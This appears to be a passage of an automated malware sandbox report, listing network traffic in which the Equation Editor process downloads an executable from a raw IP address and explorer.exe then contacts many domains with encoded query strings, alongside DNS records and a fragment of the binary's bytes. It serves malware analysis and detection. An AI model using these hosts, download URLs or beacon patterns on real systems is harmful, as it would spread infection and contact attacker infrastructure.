Sep 15, 2021 11:16:35.526148081 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526154041 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.526170015 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526187897 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.526190996 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526194096 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.526211977 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.526226997 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638143063 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638185978 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638216972 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638246059 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638278008 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638305902 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638334036 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638355970 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638359070 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638385057 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638389111 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638410091 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638422966 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638453007 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638453007 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638473034 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638483047 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638495922 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638511896 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638525009 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638540030 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638552904 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638570070 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638573885 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638602018 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.638618946 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.638642073 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.642138004 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.749579906 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.749674082 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.749707937 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.749742985 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749744892 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749782085 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749794006 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749798059 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749813080 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749819994 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749842882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749859095 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749876976 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749902010 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749908924 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749911070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749942064 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749969959 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.749975920 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.749977112 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750011921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750013113 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750047922 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750050068 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750081062 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750083923 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750114918 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750117064 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750149012 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750152111 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750180006 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750183105 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750211954 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750212908 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750246048 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750247002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750281096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750284910 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750322104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750323057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750355005 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750372887 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750386953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750403881 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750417948 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750437021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750449896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.750453949 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.750482082 CEST8049167198.23.212.143192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 11:17:59.482459068 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:17:59.700364113 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:04.942955017 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:04.998969078 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:10.148118019 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:10.197412014 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:20.351397038 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:20.391383886 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:25.528527021 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:25.567326069 CEST | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:30.614634991 CEST | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:30.646533012 CEST | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:36.949275970 CEST | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:36.980983973 CEST | 53 | 49972 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:41.987869978 CEST | 51771 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:42.020987034 CEST | 53 | 51771 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:18:47.027700901 CEST | 59867 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:18:47.058543921 CEST | 53 | 59867 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:08.294406891 CEST | 50315 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:08.324367046 CEST | 53 | 50315 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:13.081938982 CEST | 50072 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:13.137840033 CEST | 53 | 50072 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:18.277448893 CEST | 54304 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:18.600385904 CEST | 53 | 54304 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:28.481453896 CEST | 49894 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:28.613152981 CEST | 53 | 49894 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:51.494481087 CEST | 64645 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:51.622936964 CEST | 53 | 64645 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:54.659806013 CEST | 53745 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:54.693376064 CEST | 53 | 53745 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:19:59.824009895 CEST | 54358 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:19:59.867867947 CEST | 53 | 54358 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:20:04.956995964 CEST | 65017 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:20:04.990484953 CEST | 53 | 65017 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:21:29.345312119 CEST | 58341 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:21:29.381974936 CEST | 53 | 58341 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:21:34.382951021 CEST | 56383 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:21:34.426151037 CEST | 53 | 56383 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:21:39.423052073 CEST | 62172 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:21:39.455261946 CEST | 53 | 62172 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:22:17.646498919 CEST | 60859 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:22:17.671439886 CEST | 53 | 60859 | 8.8.8.8 | 192.168.2.22
Sep 15, 2021 11:23:14.544867039 CEST | 59055 | 53 | 192.168.2.22 | 8.8.8.8
Sep 15, 2021 11:23:14.577768087 CEST | 53 | 59055 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 11:17:59.482459068 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.americanstonesusa.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:04.942955017 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.plasticplank.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:10.148118019 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.realstyleworks.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:20.351397038 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.authorjameswshepherdonline.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:25.528527021 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.aedenpure.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:30.614634991 CEST | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.requotation.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:36.949275970 CEST | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.mysahuarita.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:41.987869978 CEST | 192.168.2.22 | 8.8.8.8 | 0xb02b | Standard query (0) | www.renatradingbv.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:47.027700901 CEST | 192.168.2.22 | 8.8.8.8 | 0x43f4 | Standard query (0) | www.oakridge-pm.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:08.294406891 CEST | 192.168.2.22 | 8.8.8.8 | 0xa804 | Standard query (0) | www.oakridge-pm.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:13.081938982 CEST | 192.168.2.22 | 8.8.8.8 | 0x1d11 | Standard query (0) | www.hanlansmojitovillage.net | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:18.277448893 CEST | 192.168.2.22 | 8.8.8.8 | 0x1f97 | Standard query (0) | www.thaibinhgear.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:28.481453896 CEST | 192.168.2.22 | 8.8.8.8 | 0x1873 | Standard query (0) | www.goldmig.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:51.494481087 CEST | 192.168.2.22 | 8.8.8.8 | 0x8ea6 | Standard query (0) | www.goldmig.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:54.659806013 CEST | 192.168.2.22 | 8.8.8.8 | 0x6882 | Standard query (0) | www.thaysay.net | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:59.824009895 CEST | 192.168.2.22 | 8.8.8.8 | 0xdd21 | Standard query (0) | www.asoboawa.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:20:04.956995964 CEST | 192.168.2.22 | 8.8.8.8 | 0xc78d | Standard query (0) | www.onpar-golf.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:29.345312119 CEST | 192.168.2.22 | 8.8.8.8 | 0xe633 | Standard query (0) | www.mysahuarita.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:34.382951021 CEST | 192.168.2.22 | 8.8.8.8 | 0xcdd2 | Standard query (0) | www.renatradingbv.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:39.423052073 CEST | 192.168.2.22 | 8.8.8.8 | 0x76cf | Standard query (0) | www.oakridge-pm.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:22:17.646498919 CEST | 192.168.2.22 | 8.8.8.8 | 0x3f41 | Standard query (0) | www.goldmig.com | A (IP address) | IN (0x0001)
Sep 15, 2021 11:23:14.544867039 CEST | 192.168.2.22 | 8.8.8.8 | 0x495a | Standard query (0) | www.tomrings.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 11:17:59.700364113 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.americanstonesusa.com | americanstonesusa.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:17:59.700364113 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | americanstonesusa.com |  | 192.99.131.252 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:04.998969078 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.plasticplank.com | plasticplank.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:18:04.998969078 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | plasticplank.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:10.197412014 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.realstyleworks.com | realstyleworks.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:18:10.197412014 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | realstyleworks.com |  | 34.98.99.30 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:20.391383886 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.authorjameswshepherdonline.com | authorjameswshepherdonline.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:18:20.391383886 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | authorjameswshepherdonline.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:25.567326069 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.aedenpure.com |  | 217.160.0.177 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:30.646533012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.requotation.com | requotation.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:18:30.646533012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | requotation.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:36.980983973 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | Name error (3) | www.mysahuarita.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:42.020987034 CEST | 8.8.8.8 | 192.168.2.22 | 0xb02b | Name error (3) | www.renatradingbv.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 11:18:47.058543921 CEST | 8.8.8.8 | 192.168.2.22 | 0x43f4 | No error (0) | www.oakridge-pm.com | oakridge-pm.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:18:47.058543921 CEST | 8.8.8.8 | 192.168.2.22 | 0x43f4 | No error (0) | oakridge-pm.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:08.324367046 CEST | 8.8.8.8 | 192.168.2.22 | 0xa804 | No error (0) | www.oakridge-pm.com | oakridge-pm.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:08.324367046 CEST | 8.8.8.8 | 192.168.2.22 | 0xa804 | No error (0) | oakridge-pm.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:13.137840033 CEST | 8.8.8.8 | 192.168.2.22 | 0x1d11 | No error (0) | www.hanlansmojitovillage.net | hanlansmojitovillage.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:13.137840033 CEST | 8.8.8.8 | 192.168.2.22 | 0x1d11 | No error (0) | hanlansmojitovillage.net |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:18.600385904 CEST | 8.8.8.8 | 192.168.2.22 | 0x1f97 | No error (0) | www.thaibinhgear.com | thaibinhgear.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:18.600385904 CEST | 8.8.8.8 | 192.168.2.22 | 0x1f97 | No error (0) | thaibinhgear.com |  | 45.252.248.16 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:28.613152981 CEST | 8.8.8.8 | 192.168.2.22 | 0x1873 | No error (0) | www.goldmig.com | goldmig.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:28.613152981 CEST | 8.8.8.8 | 192.168.2.22 | 0x1873 | No error (0) | goldmig.com |  | 203.16.60.34 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:51.622936964 CEST | 8.8.8.8 | 192.168.2.22 | 0x8ea6 | No error (0) | www.goldmig.com | goldmig.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:51.622936964 CEST | 8.8.8.8 | 192.168.2.22 | 0x8ea6 | No error (0) | goldmig.com |  | 203.16.60.34 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:54.693376064 CEST | 8.8.8.8 | 192.168.2.22 | 0x6882 | No error (0) | www.thaysay.net | thaysay.net |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:54.693376064 CEST | 8.8.8.8 | 192.168.2.22 | 0x6882 | No error (0) | thaysay.net |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:59.867867947 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd21 | No error (0) | www.asoboawa.com | cname.landingi.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:19:59.867867947 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd21 | No error (0) | cname.landingi.com |  | 52.212.68.12 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:59.867867947 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd21 | No error (0) | cname.landingi.com |  | 108.128.238.226 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:19:59.867867947 CEST | 8.8.8.8 | 192.168.2.22 | 0xdd21 | No error (0) | cname.landingi.com |  | 54.77.19.84 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:20:04.990484953 CEST | 8.8.8.8 | 192.168.2.22 | 0xc78d | No error (0) | www.onpar-golf.com | onpar-golf.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:20:04.990484953 CEST | 8.8.8.8 | 192.168.2.22 | 0xc78d | No error (0) | onpar-golf.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:29.381974936 CEST | 8.8.8.8 | 192.168.2.22 | 0xe633 | Name error (3) | www.mysahuarita.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:34.426151037 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdd2 | Name error (3) | www.renatradingbv.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 11:21:39.455261946 CEST | 8.8.8.8 | 192.168.2.22 | 0x76cf | No error (0) | www.oakridge-pm.com | oakridge-pm.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:21:39.455261946 CEST | 8.8.8.8 | 192.168.2.22 | 0x76cf | No error (0) | oakridge-pm.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:22:17.671439886 CEST | 8.8.8.8 | 192.168.2.22 | 0x3f41 | No error (0) | www.goldmig.com | goldmig.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 11:22:17.671439886 CEST | 8.8.8.8 | 192.168.2.22 | 0x3f41 | No error (0) | goldmig.com |  | 203.16.60.34 | A (IP address) | IN (0x0001)
Sep 15, 2021 11:23:14.577768087 CEST | 8.8.8.8 | 192.168.2.22 | 0x495a | No error (0) | www.tomrings.com |  | 162.0.214.58 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 198.23.212.143
• www.americanstonesusa.com
• www.plasticplank.com
• www.realstyleworks.com
• www.authorjameswshepherdonline.com
• www.hanlansmojitovillage.net
• www.thaysay.net
• www.onpar-golf.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249167198.23.212.14380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:16:35.291671038 CEST0OUTGET /ddr/vbc.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: 198.23.212.143
                                                                                      Connection: Keep-Alive
Sep 15, 2021 11:16:35.411237955 CEST | 1 | IN | HTTP/1.1 200 OK
                                                                                      Date: Wed, 15 Sep 2021 16:16:33 GMT
                                                                                      Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
                                                                                      Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT
                                                                                      ETag: "87e00-5cc0058a7b386"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 556544
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL60t @ @xO\ H.texts t `.rsrcv@@.reloc|@BH?_o~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 192.99.131.252 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:17:59.820272923 CEST | 585 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:17:59.929552078 CEST | 586 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:17:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49185 | 34.98.99.30 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:20:20.496011972 CEST | 606 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:20:20.611011028 CEST | 607 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.22 | 49186 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
